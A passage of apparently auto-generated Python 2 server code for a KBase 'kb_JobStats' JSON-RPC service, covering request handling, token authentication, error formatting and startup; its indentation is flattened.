if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_JobStats'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_JobStats.get_app_metrics,
name='kb_JobStats.get_app_metrics',
types=[dict])
self.method_authentication['kb_JobStats.get_app_metrics'] = 'required' # noqa
self.rpc_service.add(impl_kb_JobStats.status,
name='kb_JobStats.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_JobStats ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.